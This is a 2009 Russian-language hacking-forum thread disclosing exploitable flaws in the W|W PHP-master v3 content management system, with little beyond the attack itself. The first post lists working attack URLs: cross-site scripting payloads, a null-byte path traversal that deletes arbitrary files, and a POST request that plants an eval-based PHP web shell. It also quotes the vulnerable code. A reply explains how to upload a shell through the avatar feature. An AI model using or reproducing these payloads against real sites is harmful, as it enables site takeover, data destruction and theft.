ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу W|W PHP-master v3
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

W|W PHP-master v3
  #1  
Старый 21.04.2009, 23:26
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию W|W PHP-master v3

скачать: http://www.phpedited.com/pages/dwld_file_op.php?kat=php-master&file=1224065184

xss
register_globals = On
/wwphpmaster/wap/tmpl/dw.php?url='>{xss}<!--
/wwphpmaster/wap/tmpl/hd.php?title=</title>{xss}&description=">{xss}&keywords=">{xss}&u rl='>{xss}
/wwphpmaster/wap/tmpl/err.php?action=badpass&error_color=>{xss}

удаление файлов
/wwphpmaster/wap/pages/kommf_del.php?kat=../../{filename}%00&file=b&entry=c
уязвимый код:
PHP код:
$kat=$_GET['kat'];
$file $_GET['file'];
$entry $_GET['entry'];

unlink ("../file/$kat/$file/komm/rec.$entry"); 
заливка шелла
нужны прив. админа
/wwphpmaster/wap/pages/kommf_edited.php?file=.&kat=.&entry=.
post: name=.&msg=.&kat=../../500.php%00&gb_e_mail=<?=isset($_GET['a'])?eval($_GET['a']):'';?>&gb_site.
уязвимый код:
PHP код:
if (($_SESSION['dostup']==101) || ($_SESSION['dostup']==102) || ($_SESSION['dostup']==103))
...
    $name=$_POST['name'];
    $msg=$_POST['msg'];
    $file_get=$_GET['file'];
    $name trim($name);
    $kat $_GET['kat'];
    $entry_get $_GET['entry'];
    $em $_POST['gb_e_mail'];
    $si $_POST['gb_site'];
    ...
    $file fopen("../file/$kat/$file_get/komm/rec.$entry_get","w+");
    fputs($file,$name."\n");
    fputs($file,$msg."\n");
    fputs($file,$pz_z."\n");
    fputs($file,$ses_z."\n");
    fputs($file,$em."\n");
    fputs($file,$si."\n");
    fclose($file); 
шелл:
/wwphpmaster/500.php?a=phpinfo();

раскрытие пути
бесполезное)
/wwphpmaster/wap/tmpl/func.php
/wwphpmaster/wap/tmpl/conf.php
/wwphpmaster/wap/tmpl/rega.php
/wwphpmaster/wap/pages/dwld_file.php?kat=../../&start=9
Последний раз редактировалось eLWAux; 21.04.2009 в 23:51..
 
Ответить с цитированием

  #2  
Старый 21.04.2009, 23:29
Аватар для rushter
rushter
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858

Репутация: 979


Отправить сообщение для rushter с помощью ICQ
По умолчанию
Заливка шелла через аватары,всё очень просто :
Регистрируемя,проходим авторизацию
Заходим в usr/anketa.php
Льём любой фаил через заливку аватаров
Забирает из wap\lcl\vtr\[nick].php
upd:
Если рега закрыта ничего не мешает нам обратиться напрямую к срипту регистрации pages/rgstr.php
Последний раз редактировалось rushter; 22.04.2009 в 00:15..
 
Ответить с цитированием

  #3  
Старый 23.04.2010, 15:18
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
слив РОА
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ